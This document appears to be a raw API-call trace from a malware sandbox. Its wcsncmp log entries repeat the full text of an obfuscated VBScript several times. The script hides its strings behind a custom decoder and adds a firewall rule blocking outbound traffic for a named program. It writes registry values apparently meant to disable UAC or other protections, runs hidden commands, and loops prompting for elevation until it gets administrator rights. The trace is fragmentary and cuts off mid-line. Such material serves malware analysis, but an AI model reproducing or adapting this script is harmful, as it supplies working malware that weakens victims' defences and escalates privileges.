bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.291] wcsncmp (_String1="x, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 107 [0226.292] wcsncmp (_String1=", x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0226.292] wcsncmp (_String1=" x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.292] wcsncmp (_String1="x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = 